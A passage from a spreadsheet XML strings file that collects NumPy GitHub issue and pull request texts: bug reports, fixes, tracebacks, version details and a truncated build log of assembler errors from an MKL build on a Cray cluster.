Both pytest-5.0.1 and pytest-5.1.0 abort when passed the `--durations` flag on python3.6-dbg, so temporarily disable that flag pending a fix and leave the pytest version unpinned until then.    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</si>
  <si>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TST, BUG: Use python3.6-dbg.</t>
  </si>
  <si>
    <t>Easiest to review commit-by-commit._x000D_
_x000D_
Done with the 1.16.x branch point as its base, so it can be easily backported to either 1.16 or 1.17 if desired</t>
  </si>
  <si>
    <t>BUG: Fix misuse of .names and .fields in various places</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.core', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">The following example describes the issue._x000D_
_x000D_
```_x000D_
import sys_x000D_
print("System info:\n{}\n".format(sys.version))_x000D_
_x000D_
import numpy as np_x000D_
print("NumPy version: {}\n".format(np.version.version))_x000D_
_x000D_
for val in [-2**61, -2**62-1, -2**62]:_x000D_
    print("val = {}".format(val))_x000D_
    print("Python int:  {}".format(np.binary_repr(val, 64)))_x000D_
    print("NumPy int64: {}\n".format(np.binary_repr(np.int64(val), 64)))_x000D_
```_x000D_
Output:_x000D_
```_x000D_
System info:_x000D_
3.6.8rc1 (v3.6.8rc1:cc3e73212a, Dec 11 2018, 17:37:34) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]_x000D_
_x000D_
NumPy version: 1.17.0_x000D_
_x000D_
val = -2305843009213693952_x000D_
Python int:  1110000000000000000000000000000000000000000000000000000000000000_x000D_
NumPy int64: 1110000000000000000000000000000000000000000000000000000000000000_x000D_
_x000D_
val = -4611686018427387905_x000D_
Python int:  1011111111111111111111111111111111111111111111111111111111111111_x000D_
NumPy int64: 1011111111111111111111111111111111111111111111111111111111111111_x000D_
_x000D_
val = -4611686018427387904_x000D_
Python int:  1100000000000000000000000000000000000000000000000000000000000000_x000D_
_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-29-c41b585b0ed8&gt; in &lt;module&gt;_x000D_
      8     print("val = {}".format(val))_x000D_
      9     print("Python int:  {}".format(np.binary_repr(val, 64)))_x000D_
---&gt; 10     print("NumPy int64: {}\n".format(np.binary_repr(np.int64(val), 64)))_x000D_
_x000D_
~/.local/share/virtualenvs/ai_tools-DEcp7MjW/lib/python3.6/site-packages/numpy/core/numeric.py in binary_repr(num, width)_x000D_
   1960 _x000D_
   1961             twocomp = 2**(poswidth + 1) + num_x000D_
-&gt; 1962             binary = bin(twocomp)[2:]_x000D_
   1963             binwidth = len(binary)_x000D_
   1964 _x000D_
_x000D_
TypeError: 'numpy.float64' object cannot be interpreted as an integer_x000D_
```_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>binary_repr throws error for some values of np.int64</t>
  </si>
  <si>
    <t>The docs build is not compatible with Sphinx 2.0. It was already mentioned in a PR recently, but I suppose it's better to have a separate issue for it, too._x000D_
_x000D_
Sphinx 1.8.5 works._x000D_
_x000D_
```_x000D_
make html_x000D_
# for testing_x000D_
# @echo installed numpy 0a133311b5 matches git version 0a133311b5; exit 1_x000D_
mkdir -p build/html build/doctrees_x000D_
LANG=C sphinx-build -b html -WT --keep-going -d build/doctrees  -n source build/html _x000D_
Running Sphinx v2.1.2_x000D_
1.18.dev0 1.18.0.dev0+0a13331_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/config.py", line 361, in eval_config_file_x000D_
    execfile_(filename, namespace)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/util/pycompat.py", line 86, in execfile__x000D_
    exec(code, _globals)_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 374, in &lt;module&gt;_x000D_
    class NumPyLexer(CLexer):_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 377, in NumPyLexer_x000D_
    tokens = copy.deepcopy(lexers['c'].tokens)_x000D_
KeyError: 'c'_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/cmd/build.py", line 283, in build_main_x000D_
    args.tags, args.verbosity, args.jobs, args.keep_going)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/application.py", line 209, in __init___x000D_
    self.config = Config.read(self.confdir, confoverrides or {}, self.tags)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/config.py", line 196, in read_x000D_
    namespace = eval_config_file(filename, tags)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/config.py", line 371, in eval_config_file_x000D_
    raise ConfigError(msg % traceback.format_exc())_x000D_
sphinx.errors.ConfigError: There is a programmable error in your configuration file:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/config.py", line 361, in eval_config_file_x000D_
    execfile_(filename, namespace)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/util/pycompat.py", line 86, in execfile__x000D_
    exec(code, _globals)_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 374, in &lt;module&gt;_x000D_
    class NumPyLexer(CLexer):_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 377, in NumPyLexer_x000D_
    tokens = copy.deepcopy(lexers['c'].tokens)_x000D_
KeyError: 'c'_x000D_
_x000D_
_x000D_
Configuration error:_x000D_
There is a programmable error in your configuration file:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/config.py", line 361, in eval_config_file_x000D_
    execfile_(filename, namespace)_x000D_
  File "/usr/local/lib/python3.7/site-packages/sphinx/util/pycompat.py", line 86, in execfile__x000D_
    exec(code, _globals)_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 374, in &lt;module&gt;_x000D_
    class NumPyLexer(CLexer):_x000D_
  File "/Users/bsipocz/munka/devel/numpy/doc/source/conf.py", line 377, in NumPyLexer_x000D_
    tokens = copy.deepcopy(lexers['c'].tokens)_x000D_
KeyError: 'c'_x000D_
_x000D_
make: *** [html-build] Error 2_x000D_
```</t>
  </si>
  <si>
    <t>Sphinx 2.0+ incompatibility</t>
  </si>
  <si>
    <t>['component: Documentation', 'component: build']</t>
  </si>
  <si>
    <t>`pip install numpy` on python 2.7 attempts to install numpy 1.17, which dropped python 2.7 support. This is contrary to the functionality described in [NEP 14](https://www.numpy.org/neps/nep-0014-dropping-python2.7-proposal.html), which states:_x000D_
_x000D_
&gt; ... `pip install numpy` on Python 2 will continue to give the last working release in perpetuity..._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
pip version: 19.2.2_x000D_
python: 2.7.15 |Anaconda, Inc.| (default, Oct 23 2018, 18:31:10) \n[GCC 7.3.0]</t>
  </si>
  <si>
    <t>pip install on python 2.7 attempting to install numpy 1.17, contrary to NEP 14</t>
  </si>
  <si>
    <t xml:space="preserve">Copied code for NumPy.ipmt at https://docs.scipy.org/doc/numpy/reference/generated/numpy.ipmt.html#numpy.ipmt._x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
principal = 2500.00_x000D_
per = np.arange(1*12) + 1_x000D_
ipmt = np.ipmt(0.0824/12, per, 1*12, principal)_x000D_
ppmt = np.ppmt(0.0824/12, per, 1*12, principal)_x000D_
fmt = '{0:2d} {1:8.2f} {2:8.2f} {3:8.2f}'_x000D_
for payment in per:_x000D_
    index = payment - 1_x000D_
    principal = principal + ppmt[index]_x000D_
    print(fmt.format(payment, ppmt[index], ipmt[index], principal))_x000D_
```_x000D_
_x000D_
Expected output:_x000D_
_x000D_
 1   -200.58    -17.17   2299.42_x000D_
 2   -201.96    -15.79   2097.46_x000D_
 3   -203.35    -14.40   1894.11_x000D_
 4   -204.74    -13.01   1689.37_x000D_
 5   -206.15    -11.60   1483.22_x000D_
 6   -207.56    -10.18   1275.66_x000D_
 7   -208.99    -8.76     1066.67_x000D_
 8   -210.42    -7.32      856.25_x000D_
 9   -211.87    -5.88      644.38_x000D_
10   -213.32   -4.42      431.05_x000D_
11   -214.79   -2.96      216.26_x000D_
12  -216.26    -1.49     -0.00_x000D_
_x000D_
I get:_x000D_
_x000D_
0      -216.26        -1.49         2283.74_x000D_
 1      -199.21       -18.53        2084.52_x000D_
 2      -200.58       -17.17        1883.94_x000D_
 3      -201.96       -15.79        1681.98_x000D_
 4      -203.35       -14.40        1478.64_x000D_
 5      -204.74       -13.01        1273.89_x000D_
 6      -206.15       -11.60        1067.74_x000D_
 7      -207.56       -10.18         860.18_x000D_
 8      -208.99        -8.76          651.19_x000D_
 9      -210.42        -7.32          440.77_x000D_
10      -211.87        -5.88         228.90_x000D_
11      -213.32        -4.42         15.57_x000D_
12      -214.79        -2.96        -199.21_x000D_
_x000D_
per variable is supposed to start the payment number count at 1, but as you can see, when I do it, it starts at 0 and throws off the entire array._x000D_
_x000D_
### Numpy version information: 1.17.0_x000D_
### Python version information: 3.7.3 (v3.7.3:ef4ec6ed12, Mar 25 2019, 22:22:05) [MSC v.1916 64 bit (AMD64)]_x000D_
_x000D_
How do I get an accurate array?_x000D_
Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>NumPy Example at SciPy.org</t>
  </si>
  <si>
    <t>['50 - Duplicate', 'component: numpy.lib.financial']</t>
  </si>
  <si>
    <t>BUG: fix issue #14176 _x000D_
_x000D_
This replaces the `fct` variable in `pocketfft.py` by its inverse, `inv_fct`. The actual factor is only built immediately before executing the FFT. This defers potential divide-by-zero exceptions until after the check for zero-length transforms.</t>
  </si>
  <si>
    <t>BUG: Fix ZeroDivisionError for zero length arrays in pocketfft.</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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Follow-up to #13979 </t>
  </si>
  <si>
    <t>DOC: Address typos in dispatch docs</t>
  </si>
  <si>
    <t xml:space="preserve">`np.random.binomial()` handles a single NaN properly, but not a vector of NaNs:_x000D_
_x000D_
```python_x000D_
In [1]: import numpy as np_x000D_
n_x000D_
In [2]: np.__version___x000D_
Out[2]: '1.16.3'_x000D_
_x000D_
In [3]: np.random.binomial(10, np.nan)_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-3-c1a26e2d5595&gt; in &lt;module&gt;_x000D_
----&gt; 1 np.random.binomial(10, np.nan)_x000D_
_x000D_
mtrand.pyx in mtrand.RandomState.binomial()_x000D_
_x000D_
ValueError: p is nan_x000D_
_x000D_
In [4]: np.random.binomial(10, [np.nan])_x000D_
Out[4]: array([-9223372036854775798])_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```python_x000D_
&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.16.3 3.7.3 | packaged by conda-forge | (default, Jul  1 2019, 14:38:56)_x000D_
[Clang 4.0.1 (tags/RELEASE_401/final)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>np.random.binomial with array of NaN probabilities leads to negative integer</t>
  </si>
  <si>
    <t>Continuation of the formatting of documentation on numpy.org from #14235, this removes the link to scipy.org from the breadcrumbs of links across the top of the documentation pages.</t>
  </si>
  <si>
    <t>DOC: remove scipy.org from the breadcrumb formattiong</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11521 </t>
  </si>
  <si>
    <t>DEP: Deprecate arrayprint formatting functions</t>
  </si>
  <si>
    <t>['07 - Deprecation', '56 - Needs Release Note.', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Update NEP-30, as per discussion in mailing list.</t>
  </si>
  <si>
    <t>MAINT: Update NEP-30</t>
  </si>
  <si>
    <t>DEP: Deprecate load/dump functions in favour of pickle methods</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.core', 'component: numpy.ma']</t>
  </si>
  <si>
    <t xml:space="preserve">`unique` has is consistent axes order (except the chosen one) when `axis` is not `None` now._x000D_
Details in https://github.com/numpy/numpy/issues/14244._x000D_
_x000D_
### Change_x000D_
Using `moveaxis` instead of `swapaxes` when implementation, so that the ordering_x000D_
of axes except the axis in arguments will not be broken._x000D_
</t>
  </si>
  <si>
    <t>BUG: fix inconsistent axes ordering for axis in function `unique`</t>
  </si>
  <si>
    <t>&lt;!--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Closes #13941. Suppresses zero division warnings when calculating payment terms since ```inf``` is as expected when indicating payment terms cannot be met.</t>
  </si>
  <si>
    <t>BUG: fix unexpected zero division warning in np.nper()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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[#14225](https://github.com/numpy/numpy/issues/14225)_x000D_
_x000D_
Instead of throwing a `StopIteration` error when `skip_header &gt; 0` for an empty file, it returns a `UserWarning` and an empty list. This behaviour is consistent with `skip_header=0`,` max_rows &gt; 0` and `skip_rows &gt; 0`. </t>
  </si>
  <si>
    <t>BUG: Fixes StopIteration error from 'np.genfromtext' for empty file with skip_header &gt; 0</t>
  </si>
  <si>
    <t>This is a follow-up to gh-12551. This can lead to hard to understand_x000D_
build failures, and we've warned that this change was coming for two_x000D_
releases.</t>
  </si>
  <si>
    <t>BLD: MAINT: change default behavior of build flag appending.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>As proposed in https://mail.python.org/pipermail/numpy-discussion/2019-August/079889.html</t>
  </si>
  <si>
    <t>DOC: set status of NEP 28 (website redesign) to Accepted</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: NEP']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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import numpy as np_x000D_
&lt;&lt; your code here &gt;&gt;_x000D_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t>
  </si>
  <si>
    <t xml:space="preserve">Hi! I recently write a mxnet version numpy `unique`, and find there may be something wrong._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
x = np.array([[[-4, -4, -2, -1],_x000D_
               [ 7,  5, -1,  5],_x000D_
               [ 2,  5,  0,  5]],_x000D_
_x000D_
              [[-3,  7,  0,  0],_x000D_
               [-3,  1, -2,  4],_x000D_
               [-6,  6,  0,  0]],_x000D_
_x000D_
              [[-6,  4, -7, -2],_x000D_
               [ 0, -2,  0,  1],_x000D_
               [ 5,  0, -1,  2]],_x000D_
_x000D_
              [[ 5, -2, -7,  0],_x000D_
               [-7,  0, -2,  0],_x000D_
               [-4, -3,  6,  0]],_x000D_
_x000D_
              [[-6,  1, -5,  5],_x000D_
               [ 0,  5,  1,  5],_x000D_
               [-7, -7,  5, -1]]])_x000D_
np.unique(x, axis=-1)_x000D_
```_x000D_
The result is:_x000D_
```_x000D_
       [[[-4, -4, -2, -1],_x000D_
         [ 7,  5, -1,  5],_x000D_
         [ 2,  5,  0,  5]],_x000D_
 _x000D_
        [[-3,  7,  0,  0],_x000D_
         [-3,  1, -2,  4],_x000D_
         [-6,  6,  0,  0]],_x000D_
 _x000D_
        [[-6,  4, -7, -2],_x000D_
         [ 0, -2,  0,  1],_x000D_
         [ 5,  0, -1,  2]],_x000D_
 _x000D_
        [[ 5, -2, -7,  0],_x000D_
         [-7,  0, -2,  0],_x000D_
         [-4, -3,  6,  0]],_x000D_
 _x000D_
        [[-6,  1, -5,  5],_x000D_
         [ 0,  5,  1,  5],_x000D_
         [-7, -7,  5, -1]]])_x000D_
```_x000D_
### Description_x000D_
In this example, the first two 'column' does not swap._x000D_
_x000D_
I read the source of numpy, and find it simply swap the axis before view._x000D_
In this example, for argument axis is -1 (2), the shape goes:_x000D_
(5, 3, 4)-&gt;(4, 3, 5)-&gt;(4, 15)-&gt;use view-&gt;(4, )_x000D_
The sequence of '5' and '3' is reversed, I think this is wrong._x000D_
_x000D_
If argument axis is 1, it goes:_x000D_
(5, 3, 4)-&gt;(3, 5, 4)-&gt;(3, )_x000D_
It's OK. So, It is obvious that when axis is -1, it should always get a wrong result._x000D_
_x000D_
In my implementation, the shape goes:_x000D_
(5, 3, 4)-&gt;(15, 4, 1)-&gt;(4, 15, 1)-&gt;(4, 15)-&gt;use view-&gt;(4, )_x000D_
_x000D_
I hand-write this procedure, get the shape manipulation result:_x000D_
```_x000D_
numpy version:_x000D_
array([[-4, -3, -6,  5, -6,  7, -3,  0, -7,  0,  2, -6,  5, -4, -7],_x000D_
       [-4,  7,  4, -2,  1,  5,  1, -2,  0,  5,  5,  6,  0, -3, -7],_x000D_
       [-2,  0, -7, -7, -5, -1, -2,  0, -2,  1,  0,  0, -1,  6,  5],_x000D_
       [-1,  0, -2,  0,  5,  5,  4,  1,  0,  5,  5,  0,  2,  0, -1]])_x000D_
_x000D_
correct version:_x000D_
array([[-4,  7,  2, -3, -3, -6, -6,  0,  5,  5, -7, -4, -6,  0, -7],_x000D_
       [-4,  5,  5,  7,  1,  6,  4, -2,  0, -2,  0, -3,  1,  5, -7],_x000D_
       [-2, -1,  0,  0, -2,  0, -7,  0, -1, -7, -2,  6, -5,  1,  5],_x000D_
       [-1,  5,  5,  0,  4,  0, -2,  1,  2,  0,  0,  0,  5,  5, -1]])_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
numpy : 1.16_x000D_
OS : MacOS_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inconsistent shape manipulation in operator `unique`</t>
  </si>
  <si>
    <t>['00 - Bug', '56 - Needs Release Note.', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Something weird happened with numpy when i tried to run my code:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import os_x000D_
os.environ["OPENBLAS_NUM_THREADS"] = "1"_x000D_
import numpy as np_x000D_
import pylab_x000D_
import re_x000D_
def generate_models(x, y, degs):_x000D_
    """_x000D_
    Generate regression models by fitting a polynomial for each degree in degs_x000D_
    to points (x, y)._x000D_
    Args:_x000D_
        x: a list with length N, representing the x-coords of N sample points_x000D_
        y: a list with length N, representing the y-coords of N sample points_x000D_
        degs: a list of degrees of the fitting polynomial_x000D_
    Returns:_x000D_
        a list of numpy arrays, where each array is a 1-d array of coefficients_x000D_
        that minimizes the squared error of the fitting polynomial_x000D_
    """_x000D_
    return list(map(lambda deg : np.polyfit(x ,y ,deg), degs)) #or pylab_x000D_
#OR_x000D_
    return [ np.polyfit(x,y, deg) for deg in degs] #or pylab_x000D_
_x000D_
```_x000D_
_x000D_
It gave me_x000D_
_x000D_
### Error message:_x000D_
    File "/opt/anaconda3/lib/python3.7/site-packages/numpy/lib/polynomial.py", line 602, in polyfit_x000D_
    raise TypeError("expected x and y to have same length")_x000D_
_x000D_
But when i tried :_x000D_
   `return map(lambda deg : pylab.polyfit(x ,y ,deg), degs)`_x000D_
which run without any issues_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 3.7.3 (default, Mar 27 2019, 22:11:17)_x000D_
IPython 7.7.0 _x000D_
numpy 1.16.4_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>A weird error in polyfit</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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Reference  [ #14238](https://github.com/numpy/numpy/issues/14238)_x000D_
_x000D_
I made the assumption that anyone who passes a string  `x` to the function `np.random.permutation(x)` most likely intend to shuffle the string in question. I suggest that if this isn't the desired behaviour, then I can flag an error instead of the segfault. </t>
  </si>
  <si>
    <t>BUG: Fix segfault in `random.permutation(x)` when  x is a string.</t>
  </si>
  <si>
    <t xml:space="preserve">`np.lexsort` would fail on empty arrays with non-standard strides as a result of the changes in #13691. While fixing this I tried to also solve a couple of other problems/leaks that could be triggered in low-memory situations._x000D_
_x000D_
Fixes #14228 </t>
  </si>
  <si>
    <t>BUG: Don't fail when lexsorting some empty arrays.</t>
  </si>
  <si>
    <t>New module `numpy.random` in `1.17.0` caused `ModuleNotFoundError` for module-freeze analysis project like PyInstaller._x000D_
_x000D_
```bash_x000D_
  File "c:\python37-x64\lib\site-packages\PyInstaller\loader\pyimod03_importers.py", line 627, in exec_module_x000D_
    exec(bytecode, module.__dict__)_x000D_
  File "site-packages\numpy\__init__.py", line 150, in &lt;module&gt;_x000D_
  File "c:\python37-x64\lib\site-packages\PyInstaller\loader\pyimod03_importers.py", line 627, in exec_module_x000D_
    exec(bytecode, module.__dict__)_x000D_
  File "site-packages\numpy\random\__init__.py", line 180, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 1, in init numpy.random.mtrand_x000D_
ModuleNotFoundError: No module named 'numpy.random.common'_x000D_
```_x000D_
_x000D_
So I added some "hooks" for that.</t>
  </si>
  <si>
    <t>ENH: add c-imported modules for freeze analysis in np.random</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14206 _x000D_
</t>
  </si>
  <si>
    <t>BUG: Fixed default BitGenerator name</t>
  </si>
  <si>
    <t>Change the links in the blue boxes at the top of each page to numpy.org, numpy.org/doc and scipy.org._x000D_
_x000D_
Continuation of numpy/numpy.org#25 and gh-14073</t>
  </si>
  <si>
    <t>DOC: add backlinks to numpy.org</t>
  </si>
  <si>
    <t>While testing https://github.com/cupy/cupy/pull/2355 I found I was getting this error:_x000D_
```_x000D_
E     File "/home/larsoner/python/cupy/tests/cupyx_tests/scipy_tests/fft_tests/test_fft.py", line 76, in test_ifft_overwrite_x000D_
E       **overwrite_kw)_x000D_
E     File "&lt;__array_function__ internals&gt;", line 6, in ifft_x000D_
E     File "/home/larsoner/python/numpy/numpy/fft/pocketfft.py", line 274, in ifft_x000D_
E       fct = 1/n_x000D_
E   ZeroDivisionError: division by zero_x000D_
```_x000D_
This fixes it by ensuring the correct, more informative error message is emitted.</t>
  </si>
  <si>
    <t>MAINT: Better error message for norm</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to build numpy on a Cray CNL5 cluster but I'm running into dozens of error messages during compilation._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
I'm building with Intel MKL and the following `site.cfg`:_x000D_
```_x000D_
[mkl]_x000D_
libraries = mkl_rt_x000D_
library_dirs = /mnt/a/u/sciteam/stewart1/spack/opt/spack/cray-cnl5-interlagos/gcc-6.3.0/intel-mkl-2019.3.199-cdicvhxynjclwzqdbzukhptdkp7oo47g/compilers_and_libraries_2019.3.199/linux/mkl/lib/intel64:/usr/lib64_x000D_
rpath = /mnt/a/u/sciteam/stewart1/spack/opt/spack/cray-cnl5-interlagos/gcc-6.3.0/intel-mkl-2019.3.199-cdicvhxynjclwzqdbzukhptdkp7oo47g/compilers_and_libraries_2019.3.199/linux/mkl/lib/intel64:/usr/lib64_x000D_
include_dirs = /mnt/a/u/sciteam/stewart1/spack/opt/spack/cray-cnl5-interlagos/gcc-6.3.0/intel-mkl-2019.3.199-cdicvhxynjclwzqdbzukhptdkp7oo47g/compilers_and_libraries_2019.3.199/linux/mkl/include_x000D_
```_x000D_
```console_x000D_
$ python -s setup.py --no-user-cfg build_x000D_
$ python -s setup.py --no-user-cfg install --prefix=/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy --single-version-externally-managed --root=/_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
/tmp/ccVt9lVz.s: Assembler messages:_x000D_
/tmp/ccVt9lVz.s:3885: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:3895: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:3901: Error: bad register name `%zmm8'_x000D_
/tmp/ccVt9lVz.s:3906: Error: bad register name `%zmm9'_x000D_
/tmp/ccVt9lVz.s:3911: Error: bad register name `%zmm3'_x000D_
/tmp/ccVt9lVz.s:3916: Error: bad register name `%zmm10'_x000D_
/tmp/ccVt9lVz.s:3921: Error: bad register name `%zmm11'_x000D_
/tmp/ccVt9lVz.s:3926: Error: bad register name `%zmm12'_x000D_
/tmp/ccVt9lVz.s:3931: Error: bad register name `%zmm13'_x000D_
/tmp/ccVt9lVz.s:3936: Error: bad register name `%zmm14'_x000D_
/tmp/ccVt9lVz.s:3941: Error: bad register name `%zmm15'_x000D_
/tmp/ccVt9lVz.s:3946: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:3951: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:3956: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:3961: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:3966: Error: no such instruction: `vmovdqa64 %zmm6,-112(%rbp)'_x000D_
/tmp/ccVt9lVz.s:3973: Error: no such instruction: `vpxord %zmm2,%zmm2,%zmm2'_x000D_
/tmp/ccVt9lVz.s:3979: Error: no such instruction: `vmovdqu32 %zmm6,%zmm6'_x000D_
/tmp/ccVt9lVz.s:3987: Error: bad register name `%zmm7'_x000D_
/tmp/ccVt9lVz.s:3992: Error: bad register name `%zmm18'_x000D_
/tmp/ccVt9lVz.s:4003: Error: no such instruction: `kmovw %eax,%k5'_x000D_
/tmp/ccVt9lVz.s:4008: Error: bad register name `%zmm19'_x000D_
/tmp/ccVt9lVz.s:4023: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4024: Error: no such instruction: `kmovw %k5,%k6'_x000D_
/tmp/ccVt9lVz.s:4031: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:4040: Error: bad register name `%zmm14'_x000D_
/tmp/ccVt9lVz.s:4045: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:4052: Error: bad register name `%zmm6,4)'_x000D_
/tmp/ccVt9lVz.s:4063: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4071: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4079: Error: bad register name `%zmm18'_x000D_
/tmp/ccVt9lVz.s:4084: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4089: Error: bad register name `%zmm7'_x000D_
/tmp/ccVt9lVz.s:4096: Error: no such instruction: `kmovw %k3,%eax'_x000D_
/tmp/ccVt9lVz.s:4102: Error: no such instruction: `korw %k4,%k2,%k3'_x000D_
/tmp/ccVt9lVz.s:4108: Error: no such instruction: `korw %k1,%k3,%k3'_x000D_
/tmp/ccVt9lVz.s:4114: Error: no such instruction: `kmovw %k1,%ecx'_x000D_
/tmp/ccVt9lVz.s:4123: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4137: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4143: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:4152: Error: bad register name `%zmm8'_x000D_
/tmp/ccVt9lVz.s:4158: Error: bad register name `%zmm9'_x000D_
/tmp/ccVt9lVz.s:4164: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4172: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4178: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4183: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4189: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4195: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4201: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4207: Error: bad register name `%zmm21'_x000D_
/tmp/ccVt9lVz.s:4214: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4222: Error: no such instruction: `vscalefps %zmm20,%zmm0,%zmm0'_x000D_
/tmp/ccVt9lVz.s:4231: Error: bad register name `%zmm19'_x000D_
/tmp/ccVt9lVz.s:4239: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4247: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4255: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4302: Error: no such instruction: `kmovw %eax,%k5'_x000D_
/tmp/ccVt9lVz.s:4307: Error: bad register name `%zmm7'_x000D_
/tmp/ccVt9lVz.s:4312: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:4317: Error: bad register name `%zmm0'_x000D_
/tmp/ccVt9lVz.s:4332: Error: invalid character '{' in operand 2_x000D_
/tmp/ccVt9lVz.s:4340: Error: bad register name `%zmm17'_x000D_
/tmp/ccVt9lVz.s:4349: Error: bad register name `%zmm14'_x000D_
/tmp/ccVt9lVz.s:4354: Error: bad register name `%zmm16'_x000D_
/tmp/ccVt9lVz.s:4363: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4371: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4379: Error: bad register name `%zmm1'_x000D_
/tmp/ccVt9lVz.s:4384: Error: bad register name `%zmm5'_x000D_
/tmp/ccVt9lVz.s:4389: Error: bad register name `%zmm7'_x000D_
/tmp/ccVt9lVz.s:4396: Error: no such instruction: `kmovw %k3,%eax'_x000D_
/tmp/ccVt9lVz.s:4402: Error: no such instruction: `korw %k4,%k2,%k3'_x000D_
/tmp/ccVt9lVz.s:4408: Error: no such instruction: `korw %k1,%k3,%k3'_x000D_
/tmp/ccVt9lVz.s:4414: Error: no such instruction: `kmovw %k1,%ecx'_x000D_
/tmp/ccVt9lVz.s:4423: Error: bad register name `%zmm2'_x000D_
/tmp/ccVt9lVz.s:4437: Error: bad register name `%zmm6'_x000D_
/tmp/ccVt9lVz.s:4443: Error: bad register name `%zmm4'_x000D_
/tmp/ccVt9lVz.s:4452: Error: bad register name `%zmm8'_x000D_
